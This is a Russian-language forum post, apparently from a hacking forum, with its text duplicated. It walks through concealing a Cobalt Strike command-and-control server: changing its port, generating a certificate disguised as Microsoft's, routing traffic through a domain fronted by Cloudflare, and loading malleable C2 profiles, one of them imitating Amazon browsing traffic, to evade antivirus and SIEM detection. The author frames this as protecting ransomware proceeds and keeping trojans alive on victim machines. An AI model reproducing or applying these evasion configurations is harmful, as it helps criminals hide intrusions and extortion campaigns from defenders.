Решил начать тему именно здесь так как в РУ сегменте данный вопрос не обсуждался, так же поступает много вопросов касаемо всем известной утилиты указанной в заголовке.
Почему Ондрик8 палится этот инструмент, почему я не могу по сети с ним ходить как показано у Рафаэля на картинках, да? Отвэчай Ондрык !!!
ну в общем, как то так живем....
Значит, к делу
Начну пожалуй с главного, а именно с того что в основном у всех ваш командный сервер в простонародий Ц2, с момента установки этого самого Cobalt-овича начинает палится, гореть и искрится на весь интернет, мало того вы и ваш сервер можете попасть в сводки новостей твиттера, как минимум... а почему "вы" да банально с мамкиной картонки эти сервера и покупаются потом доказывай что не верблюд)
ну и для полноты картины, а то по думаете что пытаюсь ввести в заблуждение, реально есть энтузиасты которым не..уй-чего делать)
так вот происходит это все дело из за лени тупости и не понимания как использовать данный инструмент, обьясню первую причину.
в файле teamserver , должны знать такой или слышали хотя бы, что это не бинарь а просто текстовый файл и его можно банально открыть в блокноте и в конце увидеть удивительные строки..
сама главная картинка темы)
Видим знакомые 5 цифр 50050 это порт приема сервера для приема подключения панели управления, его МОЖНО сменить, чуть выше сказано по немецки правда, что при желании можно сменить и сам сертификат для подключения к этому самому серверу. Это типа что бы вас никто не смог послушать типо МИТМу замутить пока вы там толпой ботов управляете, проще говоря..
Так вот, уже как бы ясно что если хотя бы сменить порт, уже появляется надежда на будущее к примеру сможете потратить деньги с которые вы получили с выкупа "размотанной" вами "сетки" не суть, а если еще и сертификат новый сгенерить и скормить ему, то на пир можно и противоположный пол, пригласить на кутеж!
Этим и займемся
оригинальные слайды, без моих комментариев
что бы это исправить нужно удалить файл с названием : cobaltstrike.store в его папке и создать свой сертификат:
Если сменили пароль к сертификату как в моем случае то его также нужно сменить:
как видно в последней строке...
результат изменений можете проверить командой:
Далее для того что бы растворится в в легальном, защищенным трафике от систем защит АВ СИЕМ и прочей нечести нужно (желательно) привязать к IP адресу какой нить домен 1-ого уровня, любой [ major.ru ] к примеру..
И главное действо которое нужно сделать это регнутся в сервисе протекции и защиты , не реклама: cloudflare (хотя не отказался бы от премии, клиент по прет чую..)
там же прописать свой домен и подать без платную заявку на сертификат HTTPS (точно по прет) выдает он его быстро!
получим в формате PEM сам сертификат и ключи к нему, сохраняем в папке кобальта и прописываем в него же:
И на конец для полного эффекта создадим "Гибкий профиль" что это и для чего он нужен можете узнать здесь, я всего лишь что вам не мучатся дам его код
Боевой профиль Амазон
Скармливаем его CS-ычу
и пробуем стартануть сам teamserver
по идее все должно быть хорошо и идеально но у меня ошибка... по этому позорных слайдов не будет(( но тема из разряда вопрос-ответ, и получить по идее должны:
Трояны общаются через CDN прокладку по защищенному соединению который уже на голову выше обычных с рядом преимуществ и т.д. то есть можно создавать Listener прямо указывая доменное имя
отпишите как у Вас это все происходит? )
ПС я подозреваю что в ломанном CS такое не провернешь ..
Почему Ондрик8 палится этот инструмент, почему я не могу по сети с ним ходить как показано у Рафаэля на картинках, да? Отвэчай Ондрык !!!
ну в общем, как то так живем....
Значит, к делу
Начну пожалуй с главного, а именно с того что в основном у всех ваш командный сервер в простонародий Ц2, с момента установки этого самого Cobalt-овича начинает палится, гореть и искрится на весь интернет, мало того вы и ваш сервер можете попасть в сводки новостей твиттера, как минимум... а почему "вы" да банально с мамкиной картонки эти сервера и покупаются потом доказывай что не верблюд)
ну и для полноты картины, а то по думаете что пытаюсь ввести в заблуждение, реально есть энтузиасты которым не..уй-чего делать)
Ссылка скрыта от гостей
так вот происходит это все дело из за лени тупости и не понимания как использовать данный инструмент, обьясню первую причину.
в файле teamserver , должны знать такой или слышали хотя бы, что это не бинарь а просто текстовый файл и его можно банально открыть в блокноте и в конце увидеть удивительные строки..
сама главная картинка темы)
Видим знакомые 5 цифр 50050 это порт приема сервера для приема подключения панели управления, его МОЖНО сменить, чуть выше сказано по немецки правда, что при желании можно сменить и сам сертификат для подключения к этому самому серверу. Это типа что бы вас никто не смог послушать типо МИТМу замутить пока вы там толпой ботов управляете, проще говоря..
Так вот, уже как бы ясно что если хотя бы сменить порт, уже появляется надежда на будущее к примеру сможете потратить деньги с которые вы получили с выкупа "размотанной" вами "сетки" не суть, а если еще и сертификат новый сгенерить и скормить ему, то на пир можно и противоположный пол, пригласить на кутеж!
Этим и займемся
оригинальные слайды, без моих комментариев
что бы это исправить нужно удалить файл с названием : cobaltstrike.store в его папке и создать свой сертификат:
Код:
keytool -keystore ./cobaltstrike.store -storepass 1234567zx -keypass 1234567zx -genkey -keyalg RSA -alias microsoft -dname "CN=microsoft LTD, OU=LTD, O=microsoft, L=SOM, S=COM, C=US"Если сменили пароль к сертификату как в моем случае то его также нужно сменить:
как видно в последней строке...
результат изменений можете проверить командой:
Код:
keytool -list -v -keystore cobaltstrike.storeДалее для того что бы растворится в в легальном, защищенным трафике от систем защит АВ СИЕМ и прочей нечести нужно (желательно) привязать к IP адресу какой нить домен 1-ого уровня, любой [ major.ru ] к примеру..
И главное действо которое нужно сделать это регнутся в сервисе протекции и защиты , не реклама: cloudflare (хотя не отказался бы от премии, клиент по прет чую..)
там же прописать свой домен и подать без платную заявку на сертификат HTTPS (точно по прет) выдает он его быстро!
получим в формате PEM сам сертификат и ключи к нему, сохраняем в папке кобальта и прописываем в него же:
Код:
openssl pkcs12 -export -in b.pem -inkey b.key -out major.ru.p12 -name major.ru -passout pass:1234567zx
keytool -importkeystore -deststorepass 1234567zx -destkeypass 1234567zx -destkeystore major.ru.store -srckeystore major.ru.p12 -srcstoretype PKCS12 -srcstorepass 1234567zx -alias major.ruИ на конец для полного эффекта создадим "Гибкий профиль" что это и для чего он нужен можете узнать здесь, я всего лишь что вам не мучатся дам его код
Код:
https-certificate {
set keystore "major.ru.store";
set password "1234567zx";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "major.ru";}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "major.ru";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "major.ru";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}Боевой профиль Амазон
Код:
# Боевой профиль Амазон
# Amazon browsing traffic profile
# 11 12 строку меняем
set sleeptime "5000";
set jitter "0";
set maxdns "255";
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
https-certificate {
set keystore "major.ru.store";
set password "1234567zx";
}
http-get {
set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books";
client {
header "Accept" "*/*";
header "Host" "www.amazon.com";
metadata {
base64;
prepend "session-token=";
prepend "skin=noskin;";
append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996";
header "Cookie";
}
}
server {
header "Server" "Server";
header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT";
header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
header "X-Frame-Options" "SAMEORIGIN";
header "Content-Encoding" "gzip";
output {
print;
}
}
}
http-post {
set uri "/N4215/adj/amzn.us.sr.aps";
client {
header "Accept" "*/*";
header "Content-Type" "text/xml";
header "X-Requested-With" "XMLHttpRequest";
header "Host" "www.amazon.com";
parameter "sz" "160x600";
parameter "oe" "oe=ISO-8859-1;";
id {
parameter "sn";
}
parameter "s" "3717";
parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com";
output {
base64;
print;
}
}
server {
header "Server" "Server";
header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT";
header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo=";
header "X-Frame-Options" "SAMEORIGIN";
header "x-ua-compatible" "IE=edge";
output {
print;
}
}
}Скармливаем его CS-ычу
Код:
./c2lint major.profileи пробуем стартануть сам teamserver
Код:
teamservser 12.12.12.12 pass major.profileпо идее все должно быть хорошо и идеально но у меня ошибка... по этому позорных слайдов не будет(( но тема из разряда вопрос-ответ, и получить по идее должны:
Трояны общаются через CDN прокладку по защищенному соединению который уже на голову выше обычных с рядом преимуществ и т.д. то есть можно создавать Listener прямо указывая доменное имя
Ссылка скрыта от гостей
так же можно их создать целую пачку и скормить CиSычу и тогда ваши звери будут жить дольше в вражеских ПК но ...отпишите как у Вас это все происходит? )
ПС я подозреваю что в ломанном CS такое не провернешь ..
Последнее редактирование:
